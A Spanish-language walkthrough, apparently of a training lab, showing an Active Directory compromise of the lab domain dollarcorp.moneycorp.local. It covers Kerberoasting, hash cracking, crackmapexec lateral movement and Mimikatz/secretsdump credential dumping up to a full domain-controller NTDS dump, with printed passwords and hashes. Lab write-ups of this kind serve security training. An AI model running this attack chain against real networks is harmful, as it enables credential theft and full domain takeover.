Learning Objective - 7
Last updated
Last updated
PS C:\AD\Tools> .\Rubeus.exe kerberoast /outfile:hashes.kerberoast
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v2.2.1
[*] Action: Kerberoasting
[*] NOTICE: AES hashes will be returned for AES-enabled accounts.
[*] Use /ticket:X or /tgtdeleg to force RC4_HMAC for these accounts.
[*] Target Domain : dollarcorp.moneycorp.local
[*] Searching path 'LDAP://dcorp-dc.dollarcorp.moneycorp.local/DC=dollarcorp,DC=moneycorp,DC=local' for '(&(samAccountType=805306368)(servicePrincipalName=*)(!samAccountName=krbtgt)(!(UserAccountControl:1.2.840.113556.1.4.803:=2)))'
[*] Total kerberoastable users : 2
[*] SamAccountName : websvc
[*] DistinguishedName : CN=web svc,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
[*] ServicePrincipalName : SNMP/ufc-adminsrv.dollarcorp.moneycorp.LOCAL
[*] PwdLastSet : 11/14/2022 4:42:13 AM
[*] Supported ETypes : RC4_HMAC_DEFAULT
[*] Hash written to C:\AD\Tools\hashes.kerberoast
[*] SamAccountName : svcadmin
[*] DistinguishedName : CN=svc admin,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
[*] ServicePrincipalName : MSSQLSvc/dcorp-mgmt.dollarcorp.moneycorp.local:1433
[*] PwdLastSet : 11/14/2022 9:06:37 AM
[*] Supported ETypes : RC4_HMAC_DEFAULT
[*] Hash written to C:\AD\Tools\hashes.kerberoast
[*] Roasted hashes written to : C:\AD\Tools\hashes.kerberoastSession..........: hashcat
Status...........: Exhausted
Hash.Mode........: 13100 (Kerberos 5, etype 23, TGS-REP)
Hash.Target......: hashes.kerberoast
Time.Started.....: Thu Feb 22 04:26:58 2024, (1 min, 6 secs)
Time.Estimated...: Thu Feb 22 04:28:04 2024, (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (rockyou.txt)
Guess.Mod........: Rules (clem9669_small.rule.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 164.3 MH/s (4.97ms) @ Accel:8 Loops:128 Thr:32 Vec:1
Recovered........: 0/2 (0.00%) Digests (total), 0/2 (0.00%) Digests (new), 0/2 (0.00%) Salts
Progress.........: 11045180300/11045180300 (100.00%)
Rejected.........: 0/11045180300 (0.00%)
Restore.Point....: 14344390/14344390 (100.00%)
Restore.Sub.#1...: Salt:1 Amplifier:384-385 Iteration:0-128
Candidate.Engine.: Device Generator
Candidates.#1....: !!sexyangel!! -> retr02301
Hardware.Mon.#1..: Temp: 62c Fan: 32% Util: 40% Core:2025MHz Mem:10251MHz Bus:16
Started: Thu Feb 22 04:26:57 2024
Stopped: Thu Feb 22 04:28:05 2024:c
Pero...
Entonces, como tenemos la credenciales intentamos:
crackmapexec smb 172.16.4.44 -u ciadmin -p *ContinuousIntrusion123 -x whoami
SMB 172.16.4.44 445 DCORP-MGMT [*] Windows 10.0 Build 20348 x64 (name:DCORP-MGMT) (domain:dollarcorp.moneycorp.local) (signing:False) (SMBv1:False)
SMB 172.16.4.44 445 DCORP-MGMT [+] dollarcorp.moneycorp.local\ciadmin:*ContinuousIntrusion123 (Pwn3d!)
SMB 172.16.4.44 445 DCORP-MGMT [+] Executed command
SMB 172.16.4.44 445 DCORP-MGMT dcorp\ciadmin
Respuesta:
sqlservr.exe
[dcorp-mgmt]: PS C:\> .\SafetyKatz.exe "sekurlsa::logonPasswords full" "exit"
.#####. mimikatz 2.2.0 (x64) #19041 Dec 23 2022 16:49:51
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ## > https://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )
'#####' > https://pingcastle.com / https://mysmartlogon.com ***/
mimikatz(commandline) # sekurlsa::logonPasswords full
Authentication Id : 0 ; 132376 (00000000:00020518)
Session : Service from 0
User Name : svcadmin
Domain : dcorp
Logon Server : DCORP-DC
Logon Time : 2/19/2024 11:31:39 PM
SID : S-1-5-21-719815819-3726368948-3917688648-1118
msv :
[00000003] Primary
* Username : svcadmin
* Domain : dcorp
* NTLM : b38ff50264b74508085d82c69794a4d8
* SHA1 : a4ad2cd4082079861214297e1cae954c906501b9
* DPAPI : f26ae0cc48396dccd8caa24cd33127e7
tspkg :
wdigest :
* Username : svcadmin
* Domain : dcorp
* Password : (null)
kerberos :
* Username : svcadmin
* Domain : DOLLARCORP.MONEYCORP.LOCAL
* Password : *ThisisBlasphemyThisisMadness!!
ssp :
credman :Respuesta:
b38ff50264b74508085d82c69794a4d8impacket-secretsdump -hashes ':b38ff50264b74508085d82c69794a4d8' 'svcadmin@172.16.4.101'
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation
[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0x0aa524e1204e0a68be320cc136ed76b9
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:2c0bba089d2d62e4d8911fc2fcc0c2e2:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[*] Dumping cached domain logon information (domain/username:hash)
DOLLARCORP.MONEYCORP.LOCAL/websvc:$DCC2$10240#websvc#5100e73bf7f60de365fe1e39d21070c9
DOLLARCORP.MONEYCORP.LOCAL/appadmin:$DCC2$10240#appadmin#8bb559da7ec65410afbd8c561b37f5b5
DOLLARCORP.MONEYCORP.LOCAL/srvadmin:$DCC2$10240#srvadmin#904d497b20b7f6aa8667a17d6405289d
[*] Dumping LSA Secrets
[*] $MACHINE.ACC
dcorp\DCORP-ADMINSRV$:aes256-cts-hmac-sha1-96:e9513a0ac270264bb12fb3b3ff37d7244877d269a97c7b3ebc3f6f78c382eb51
dcorp\DCORP-ADMINSRV$:aes128-cts-hmac-sha1-96:83bfc18bd7f63a5921bf0ce2eb87755f
dcorp\DCORP-ADMINSRV$:des-cbc-md5:384552e53d8acdea
dcorp\DCORP-ADMINSRV$:plain_password_hex:51003a00680046005400270021004600550058005000360045005f003200290043004b002000640078006d00320076006c002a0027004e003e0061003b007a002d004e0049004d006f006700650069004200740048004d0074006a006700770040002c004c0078003a00590044002e003d002200350047005b0065002000200059002b0077004e0040005e00340034003e00490054004000730064005e0044007800510034004800570052005900360025003200300038003f006c005400450062005500600075002e0048003000640025007a005900490057002f006400400051006100540037005a00740064002700
dcorp\DCORP-ADMINSRV$:aad3b435b51404eeaad3b435b51404ee:b5f451985fd34d58d5120816d31b5565:::
[*] DPAPI_SYSTEM
dpapi_machinekey:0xb769847ee855152df7a4594c40a86f4e4212d031
dpapi_userkey:0x15ed629ec20c5b5e266129832d792b0bc84b1010
[*] NL$KM
0000 09 C8 7B C2 96 41 6E CB B2 F6 1B DC 29 5C 39 76 ..{..An.....)\9v
0010 7E A6 22 97 DC D3 BE 6B C3 71 48 71 61 6B B2 B3 ~."....k.qHqak..
0020 D0 D6 E0 48 F0 8B 7D 8B 8B 14 95 05 B4 21 FE 93 ...H..}......!..
0030 28 51 47 F1 26 24 B5 F4 E4 20 B6 AC E5 90 33 02 (QG.&$... ....3.
NL$KM:09c87bc296416ecbb2f61bdc295c39767ea62297dcd3be6bc3714871616bb2b3d0d6e048f08b7d8b8b149505b421fe93285147f12624b5f4e420b6ace5903302
[*] _SC_SNMPTRAP
dcorp\websvc:AServicewhichIsNotM3@nttoBe
[*] _SC_wmiApSrv
dcorp\appadmin:*ActuallyTheWebServer1
[*] Cleaning up...
[*] Stopping service RemoteRegistry
Verificando el LanguageMode
[dcorp-adminsrv]: PS C:\Program Files> echo '$ExecutionContext.SessionState.LanguageMode' > test.ps1
[dcorp-adminsrv]: PS C:\Program Files> $ExecutionContext.SessionState.LanguageMode
ConstrainedLanguage
[dcorp-adminsrv]: PS C:\Program Files> .\test.ps1
FullLanguageAgregamos una linea dentro del script Invoke-Mimikatz.ps1.
Invoke-Mimikatz -Command '"privilege::debug" "token::elevate" "Sekurlsa::LogonPasswords"'Luego ejecutamos el Mimikatz y respondemos las flags.
PS C:\Program Files> .\Invoke-Mimikatz.ps1
.#####. mimikatz 2.2.0 (x64) #19041 Sep 20 2021 19:01:18
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ## > https://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )
'#####' > https://pingcastle.com / https://mysmartlogon.com ***/
mimikatz(powershell) # privilege::debug
Privilege '20' OK
mimikatz(powershell) # token::elevate
Token Id : 0
User name :
SID name : NT AUTHORITY\SYSTEM
616 {0;000003e7} 1 D 16097 NT AUTHORITY\SYSTEM S-1-5-18 (04g,21p) Primary
-> Impersonated !
* Process Token : {0;00e70446} 0 D 15141446 dcorp\svcadmin S-1-5-21-719815819-3726368948-3917688648-1118 (11g,24p) Primary
* Thread Token : {0;000003e7} 1 D 18044422 NT AUTHORITY\SYSTEM S-1-5-18 (04g,21p) Impersonation (Delegation)
mimikatz(powershell) # Sekurlsa::LogonPasswords
Authentication Id : 0 ; 752154 (00000000:000b7a1a)
Session : RemoteInteractive from 2
User Name : srvadmin
Domain : dcorp
Logon Server : DCORP-DC
Logon Time : 2/19/2024 11:45:15 PM
SID : S-1-5-21-719815819-3726368948-3917688648-1115
msv :
[00000003] Primary
* Username : srvadmin
* Domain : dcorp
* NTLM : a98e18228819e8eec3dfa33cb68b0728
* SHA1 : f613d1bede9a620ba16ae786e242d3027809c82a
* DPAPI : a593cded7a622d70818fb3315264a140
tspkg :
wdigest :
* Username : srvadmin
* Domain : dcorp
* Password : (null)
kerberos :
* Username : srvadmin
* Domain : DOLLARCORP.MONEYCORP.LOCAL
* Password : (null)
ssp :
credman :
Authentication Id : 0 ; 144880 (00000000:000235f0)
Session : Service from 0
User Name : websvc
Domain : dcorp
Logon Server : DCORP-DC
Logon Time : 2/19/2024 11:31:06 PM
SID : S-1-5-21-719815819-3726368948-3917688648-1114
msv :
[00000003] Primary
* Username : websvc
* Domain : dcorp
* NTLM : cc098f204c5887eaa8253e7c2749156f
* SHA1 : 36f2455c767ac9945fdc7cd276479a6a011e154b
* DPAPI : afa3166d71b438639f1c77118153d316
tspkg :
wdigest :
* Username : websvc
* Domain : dcorp
* Password : (null)
kerberos :
* Username : websvc
* Domain : DOLLARCORP.MONEYCORP.LOCAL
* Password : AServicewhichIsNotM3@nttoBe
ssp :
credman :
Authentication Id : 0 ; 996 (00000000:000003e4)
Session : Service from 0
User Name : DCORP-ADMINSRV$
Domain : dcorp
Logon Server : (null)
Logon Time : 2/19/2024 11:30:50 PM
SID : S-1-5-20
msv :
[00000003] Primary
* Username : DCORP-ADMINSRV$
* Domain : dcorp
* NTLM : b5f451985fd34d58d5120816d31b5565
* SHA1 : f83c66f77706d11664e98e159166687298ab1a2c
* DPAPI : f83c66f77706d11664e98e1591666872
tspkg :
wdigest :
* Username : DCORP-ADMINSRV$
* Domain : dcorp
* Password : (null)
kerberos :
* Username : dcorp-adminsrv$
* Domain : DOLLARCORP.MONEYCORP.LOCAL
* Password : (null)
ssp :
credman :
Authentication Id : 0 ; 539692 (00000000:00083c2c)
Session : Interactive from 2
User Name : UMFD-2
Domain : Font Driver Host
Logon Server : (null)
Logon Time : 2/19/2024 11:41:47 PM
SID : S-1-5-96-0-2
msv :
[00000003] Primary
* Username : DCORP-ADMINSRV$
* Domain : dcorp
* NTLM : b5f451985fd34d58d5120816d31b5565
* SHA1 : f83c66f77706d11664e98e159166687298ab1a2c
* DPAPI : f83c66f77706d11664e98e1591666872
tspkg :
wdigest :
* Username : DCORP-ADMINSRV$
* Domain : dcorp
* Password : (null)
kerberos :
* Username : DCORP-ADMINSRV$
* Domain : dollarcorp.moneycorp.local
* Password : Q:hFT'!FUXP6E_2)CK dxm2vl*'N>a;z-NIMogeiBtHMtjgw@,Lx:YD.="5G[e Y+wN@^44>IT@sd^DxQ4HWRY6%208?lTEbU`u.H0d%zYIW/d@QaT7Ztd'
ssp :
credman :
Authentication Id : 0 ; 144881 (00000000:000235f1)
Session : Service from 0
User Name : appadmin
Domain : dcorp
Logon Server : DCORP-DC
Logon Time : 2/19/2024 11:31:06 PM
SID : S-1-5-21-719815819-3726368948-3917688648-1117
msv :
[00000003] Primary
* Username : appadmin
* Domain : dcorp
* NTLM : d549831a955fee51a43c83efb3928fa7
* SHA1 : 07de541a289d45a577f68c512c304dfcbf9e4816
* DPAPI : a5d49d98574a7574ab70fa77797c367d
tspkg :
wdigest :
* Username : appadmin
* Domain : dcorp
* Password : (null)
kerberos :
* Username : appadmin
* Domain : DOLLARCORP.MONEYCORP.LOCAL
* Password : *ActuallyTheWebServer1
ssp :
credman :
Authentication Id : 0 ; 997 (00000000:000003e5)
Session : Service from 0
User Name : LOCAL SERVICE
Domain : NT AUTHORITY
Logon Server : (null)
Logon Time : 2/19/2024 11:30:50 PM
SID : S-1-5-19
msv :
tspkg :
wdigest :
* Username : (null)
* Domain : (null)
* Password : (null)
kerberos :
* Username : (null)
* Domain : (null)
* Password : (null)
ssp :
credman :
Authentication Id : 0 ; 21178 (00000000:000052ba)
Session : Interactive from 0
User Name : UMFD-0
Domain : Font Driver Host
Logon Server : (null)
Logon Time : 2/19/2024 11:30:50 PM
SID : S-1-5-96-0-0
msv :
[00000003] Primary
* Username : DCORP-ADMINSRV$
* Domain : dcorp
* NTLM : b5f451985fd34d58d5120816d31b5565
* SHA1 : f83c66f77706d11664e98e159166687298ab1a2c
* DPAPI : f83c66f77706d11664e98e1591666872
tspkg :
wdigest :
* Username : DCORP-ADMINSRV$
* Domain : dcorp
* Password : (null)
kerberos :
* Username : DCORP-ADMINSRV$
* Domain : dollarcorp.moneycorp.local
* Password : Q:hFT'!FUXP6E_2)CK dxm2vl*'N>a;z-NIMogeiBtHMtjgw@,Lx:YD.="5G[e Y+wN@^44>IT@sd^DxQ4HWRY6%208?lTEbU`u.H0d%zYIW/d@QaT7Ztd'
ssp :
credman :
Authentication Id : 0 ; 21140 (00000000:00005294)
Session : Interactive from 1
User Name : UMFD-1
Domain : Font Driver Host
Logon Server : (null)
Logon Time : 2/19/2024 11:30:50 PM
SID : S-1-5-96-0-1
msv :
[00000003] Primary
* Username : DCORP-ADMINSRV$
* Domain : dcorp
* NTLM : b5f451985fd34d58d5120816d31b5565
* SHA1 : f83c66f77706d11664e98e159166687298ab1a2c
* DPAPI : f83c66f77706d11664e98e1591666872
tspkg :
wdigest :
* Username : DCORP-ADMINSRV$
* Domain : dcorp
* Password : (null)
kerberos :
* Username : DCORP-ADMINSRV$
* Domain : dollarcorp.moneycorp.local
* Password : Q:hFT'!FUXP6E_2)CK dxm2vl*'N>a;z-NIMogeiBtHMtjgw@,Lx:YD.="5G[e Y+wN@^44>IT@sd^DxQ4HWRY6%208?lTEbU`u.H0d%zYIW/d@QaT7Ztd'
ssp :
credman :
Authentication Id : 0 ; 20080 (00000000:00004e70)
Session : UndefinedLogonType from 0
User Name : (null)
Domain : (null)
Logon Server : (null)
Logon Time : 2/19/2024 11:30:49 PM
SID :
msv :
[00000003] Primary
* Username : DCORP-ADMINSRV$
* Domain : dcorp
* NTLM : b5f451985fd34d58d5120816d31b5565
* SHA1 : f83c66f77706d11664e98e159166687298ab1a2c
* DPAPI : f83c66f77706d11664e98e1591666872
tspkg :
wdigest :
kerberos :
ssp :
credman :
Authentication Id : 0 ; 999 (00000000:000003e7)
Session : UndefinedLogonType from 0
User Name : DCORP-ADMINSRV$
Domain : dcorp
Logon Server : (null)
Logon Time : 2/19/2024 11:30:49 PM
SID : S-1-5-18
msv :
tspkg :
wdigest :
* Username : DCORP-ADMINSRV$
* Domain : dcorp
* Password : (null)
kerberos :
* Username : dcorp-adminsrv$
* Domain : DOLLARCORP.MONEYCORP.LOCAL
* Password : (null)
ssp :
credman :lscrackmapexec smb 172.16.4.44 -u ciadmin -p *ContinuousIntrusion123 --lsa
SMB 172.16.4.44 445 DCORP-MGMT [*] Windows 10.0 Build 20348 x64 (name:DCORP-MGMT) (domain:dollarcorp.moneycorp.local) (signing:False) (SMBv1:False)
SMB 172.16.4.44 445 DCORP-MGMT [+] dollarcorp.moneycorp.local\ciadmin:*ContinuousIntrusion123 (Pwn3d!)
SMB 172.16.4.44 445 DCORP-MGMT [+] Dumping LSA secrets
SMB 172.16.4.44 445 DCORP-MGMT DOLLARCORP.MONEYCORP.LOCAL/svcadmin:$DCC2$10240#svcadmin#80dcb7982483a2ee1aaa9ef2da703179
SMB 172.16.4.44 445 DCORP-MGMT DOLLARCORP.MONEYCORP.LOCAL/mgmtadmin:$DCC2$10240#mgmtadmin#b51b86694af5c690d2ad019fbfc00707
SMB 172.16.4.44 445 DCORP-MGMT dcorp\DCORP-MGMT$:aes256-cts-hmac-sha1-96:b607d794f87ca117a14353da0dbb6f27bbe9fed4f1ce1b810b43fbb9a2eab192
SMB 172.16.4.44 445 DCORP-MGMT dcorp\DCORP-MGMT$:aes128-cts-hmac-sha1-96:0049f234ae46eba0bfb2ced5b8c8d2b4
SMB 172.16.4.44 445 DCORP-MGMT dcorp\DCORP-MGMT$:des-cbc-md5:a79234f220c4549e
SMB 172.16.4.44 445 DCORP-MGMT dcorp\DCORP-MGMT$:plain_password_hex:34003f0050006800430068004b005000280060003f00790057006000450038003d0056004d00320051004900310033004f00210069002a00330051003f005700560042002200580029003d003e0049006c0033003d00410063007a004a0030005e005400210058005d00720026003a002600790047003400310060002a002f0024005e0034002b00450065005a00300037003f007a00460032005a00330060003a005b004a0064002a0046002f007a005f00500060007000360042003900580048005e00670024002a006d005800490051004d00580059002800530063003f0033005c00410036004900430072005800
SMB 172.16.4.44 445 DCORP-MGMT dcorp\DCORP-MGMT$:aad3b435b51404eeaad3b435b51404ee:0878da540f45b31b974f73312c18e754:::
SMB 172.16.4.44 445 DCORP-MGMT dpapi_machinekey:0xb3084493f6af9cf8b2964ee53accccd428737b2c
dpapi_userkey:0xe46d070e975b2473e749e7927a64a61fe1575b20
SMB 172.16.4.44 445 DCORP-MGMT NL$KM:09c87bc296416ecbb2f61bdc295c39767ea62297dcd3be6bc3714871616bb2b3d0d6e048f08b7d8b8b149505b421fe93285147f12624b5f4e420b6ace5903302
SMB 172.16.4.44 445 DCORP-MGMT dcorp\svcadmin:*ThisisBlasphemyThisisMadness!!
SMB 172.16.4.44 445 DCORP-MGMT [+] Dumped 10 LSA secrets to /home/dsds/.cme/logs/DCORP-MGMT_172.16.4.44_2024-02-22_044511.secrets and /home/dsds/.cme/logs/DCORP-MGMT_172.16.4.44_2024-02-22_044511.cached
Probamos las nuevas creds.
crackmapexec smb 172.16.4.44 -u svcadmin -p '*ThisisBlasphemyThisisMadness!!'
SMB 172.16.4.44 445 DCORP-MGMT [*] Windows 10.0 Build 20348 x64 (name:DCORP-MGMT) (domain:dollarcorp.moneycorp.local) (signing:False) (SMBv1:False)
SMB 172.16.4.44 445 DCORP-MGMT [+] dollarcorp.moneycorp.local\svcadmin:*ThisisBlasphemyThisisMadness!! (Pwn3d!)Obtenemos la IP del dominio.
PS C:\AD\Tools\BloodHound-master\BloodHound-master\Collectors> nslookup.exe dollarcorp.moneycorp.local
Server: UnKnown
Address: 172.16.2.1
Name: dollarcorp.moneycorp.local
Address: 172.16.2.1
Probamos las creds en el DC.
crackmapexec smb 172.16.2.1 -u svcadmin -p '*ThisisBlasphemyThisisMadness!!'
SMB 172.16.2.1 445 DCORP-DC [*] Windows 10.0 Build 20348 x64 (name:DCORP-DC) (domain:dollarcorp.moneycorp.local) (signing:True) (SMBv1:False)
SMB 172.16.2.1 445 DCORP-DC [+] dollarcorp.moneycorp.local\svcadmin:*ThisisBlasphemyThisisMadness!! (Pwn3d!)Y dumpeamos todos los hashes.
crackmapexec smb 172.16.2.1 -u svcadmin -p '*ThisisBlasphemyThisisMadness!!' --sam
SMB 172.16.2.1 445 DCORP-DC [*] Windows 10.0 Build 20348 x64 (name:DCORP-DC) (domain:dollarcorp.moneycorp.local) (signing:True) (SMBv1:False)
SMB 172.16.2.1 445 DCORP-DC [+] dollarcorp.moneycorp.local\svcadmin:*ThisisBlasphemyThisisMadness!! (Pwn3d!)
SMB 172.16.2.1 445 DCORP-DC [+] Dumping SAM hashes
SMB 172.16.2.1 445 DCORP-DC Administrator:500:aad3b435b51404eeaad3b435b51404ee:a102ad5753f4c441e3af31c97fad86fd:::
SMB 172.16.2.1 445 DCORP-DC Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB 172.16.2.1 445 DCORP-DC DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
ERROR:root:SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn't have hash information.
SMB 172.16.2.1 445 DCORP-DC [+] Added 3 SAM hashes to the database
crackmapexec smb 172.16.2.1 -u svcadmin -p '*ThisisBlasphemyThisisMadness!!' --lsa
SMB 172.16.2.1 445 DCORP-DC [*] Windows 10.0 Build 20348 x64 (name:DCORP-DC) (domain:dollarcorp.moneycorp.local) (signing:True) (SMBv1:False)
SMB 172.16.2.1 445 DCORP-DC [+] dollarcorp.moneycorp.local\svcadmin:*ThisisBlasphemyThisisMadness!! (Pwn3d!)
SMB 172.16.2.1 445 DCORP-DC [+] Dumping LSA secrets
SMB 172.16.2.1 445 DCORP-DC dcorp\DCORP-DC$:aes256-cts-hmac-sha1-96:f4583f2be42c52751be1ce4e8f51c3c256c89be2b41e0b6c57c8f2cd4edadfcf
SMB 172.16.2.1 445 DCORP-DC dcorp\DCORP-DC$:aes128-cts-hmac-sha1-96:10715e504e5e3b6825f0a58aabd03108
SMB 172.16.2.1 445 DCORP-DC dcorp\DCORP-DC$:des-cbc-md5:bc321ad310ce1ab5
SMB 172.16.2.1 445 DCORP-DC dcorp\DCORP-DC$:plain_password_hex:9d2b4437a83b9f4b7038e6fdb58f506b95726a3034a92bac398a7dd61856d91ce33067a9d945f051ed1b1de95feffd32eef8481b25306953859d7242259108676568b30259b28570e0fe906928f4fcf1ae5698ae526b7c17b02a43e90b7fc2902351adc7f1bd3e8e03c0050123b1db24af4397449ebd8ea44347e68071d76a9a78b1f315229f3a2915397621d8cb968518d4937dd8ea46a988276c15a85bf0f7db00800120c318d73cdff23562b8e5d96af5754c507a760e9ba73c4ce67cb74b349f340fdd8dc9e0bac7ebd390afa440c23c8e0059de3f472359c205f7ddea65ae0efd662a35d7dc0335968eeb642886
SMB 172.16.2.1 445 DCORP-DC dcorp\DCORP-DC$:aad3b435b51404eeaad3b435b51404ee:ef7a661f7edb7f5a1be191640342d6b7:::
SMB 172.16.2.1 445 DCORP-DC dpapi_machinekey:0x558f948af84f9dec3acf3499b5e9af0de2d8e803
dpapi_userkey:0xb1b020a793cbecd7d3ad7aacbc6b73f33c9e4d43
SMB 172.16.2.1 445 DCORP-DC NL$KM:2155a8f764dd9afa80950f03e8e4765e11349956de62e100c6fd7db814af4f7358c168e316e2049893a539c61b7ae419fee6efdc7364728cf92af25c68d2db73
SMB 172.16.2.1 445 DCORP-DC [+] Dumped 7 LSA secrets to /home/dsds/.cme/logs/DCORP-DC_172.16.2.1_2024-02-22_050159.secrets and /home/dsds/.cme/logs/DCORP-DC_172.16.2.1_2024-02-22_050159.cached
crackmapexec smb 172.16.2.1 -u svcadmin -p '*ThisisBlasphemyThisisMadness!!' --ntds
SMB 172.16.2.1 445 DCORP-DC [*] Windows 10.0 Build 20348 x64 (name:DCORP-DC) (domain:dollarcorp.moneycorp.local) (signing:True) (SMBv1:False)
SMB 172.16.2.1 445 DCORP-DC [+] dollarcorp.moneycorp.local\svcadmin:*ThisisBlasphemyThisisMadness!! (Pwn3d!)
SMB 172.16.2.1 445 DCORP-DC [+] Dumping the NTDS, this could take a while so go grab a redbull...
SMB 172.16.2.1 445 DCORP-DC Administrator:500:aad3b435b51404eeaad3b435b51404ee:af0686cc0ca8f04df42210c9ac980760:::
SMB 172.16.2.1 445 DCORP-DC Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB 172.16.2.1 445 DCORP-DC krbtgt:502:aad3b435b51404eeaad3b435b51404ee:4e9815869d2090ccfca61c1fe0d23986:::
SMB 172.16.2.1 445 DCORP-DC sqladmin\sqladmin:1113:aad3b435b51404eeaad3b435b51404ee:07e8be316e3da9a042a9cb681df19bf5:::
SMB 172.16.2.1 445 DCORP-DC websvc\websvc:1114:aad3b435b51404eeaad3b435b51404ee:cc098f204c5887eaa8253e7c2749156f:::
SMB 172.16.2.1 445 DCORP-DC srvadmin\srvadmin:1115:aad3b435b51404eeaad3b435b51404ee:b38ff50264b74508085d82c69794a4d8:::
SMB 172.16.2.1 445 DCORP-DC appadmin\appadmin:1117:aad3b435b51404eeaad3b435b51404ee:d549831a955fee51a43c83efb3928fa7:::
SMB 172.16.2.1 445 DCORP-DC svcadmin\svcadmin:1118:aad3b435b51404eeaad3b435b51404ee:b38ff50264b74508085d82c69794a4d8:::
SMB 172.16.2.1 445 DCORP-DC testda\testda:1119:aad3b435b51404eeaad3b435b51404ee:a16452f790729fa34e8f3a08f234a82c:::
SMB 172.16.2.1 445 DCORP-DC mgmtadmin\mgmtadmin:1120:aad3b435b51404eeaad3b435b51404ee:95e2cd7ff77379e34c6e46265e75d754:::
SMB 172.16.2.1 445 DCORP-DC ciadmin\ciadmin:1121:aad3b435b51404eeaad3b435b51404ee:e08253add90dccf1a208523d02998c3d:::
SMB 172.16.2.1 445 DCORP-DC sql1admin\sql1admin:1122:aad3b435b51404eeaad3b435b51404ee:e999ae4bd06932620a1e78d2112138c6:::
SMB 172.16.2.1 445 DCORP-DC dollarcorp.moneycorp.local\studentadmin:4181:aad3b435b51404eeaad3b435b51404ee:d1254f303421d3cdbdc4c73a5bce0201:::
SMB 172.16.2.1 445 DCORP-DC DCORP-DC$:1000:aad3b435b51404eeaad3b435b51404ee:ef7a661f7edb7f5a1be191640342d6b7:::
SMB 172.16.2.1 445 DCORP-DC DCORP-ADMINSRV$:1105:aad3b435b51404eeaad3b435b51404ee:b5f451985fd34d58d5120816d31b5565:::
SMB 172.16.2.1 445 DCORP-DC DCORP-APPSRV$:1106:aad3b435b51404eeaad3b435b51404ee:b4cb7bf8b93c78b8051c7906bb054dc5:::
SMB 172.16.2.1 445 DCORP-DC DCORP-CI$:1107:aad3b435b51404eeaad3b435b51404ee:f76f48c176dc09cfd5765843c32809f3:::
SMB 172.16.2.1 445 DCORP-DC DCORP-MGMT$:1108:aad3b435b51404eeaad3b435b51404ee:0878da540f45b31b974f73312c18e754:::
SMB 172.16.2.1 445 DCORP-DC DCORP-MSSQL$:1109:aad3b435b51404eeaad3b435b51404ee:b205f1ca05bedace801893d6aa5aca27:::
SMB 172.16.2.1 445 DCORP-DC DCORP-SQL1$:1110:aad3b435b51404eeaad3b435b51404ee:3686dfb420dc0f9635e70c6ca5875b49:::
SMB 172.16.2.1 445 DCORP-DC DCORP-STDADMIN$:4202:aad3b435b51404eeaad3b435b51404ee:e444bbf444732fc38065ea9e9255ab03:::
SMB 172.16.2.1 445 DCORP-DC mcorp$:1103:aad3b435b51404eeaad3b435b51404ee:f5b5c9f1ca76187393db1d3bb8ded94e:::
SMB 172.16.2.1 445 DCORP-DC US$:1104:aad3b435b51404eeaad3b435b51404ee:f85385d81cc4936d37ff8f27813f43c6:::
SMB 172.16.2.1 445 DCORP-DC ecorp$:1112:aad3b435b51404eeaad3b435b51404ee:4501e4c7f30e1cb3c9886f06a3ed1c6a:::
Respuesta:
b38ff50264b74508085d82c69794a4d8
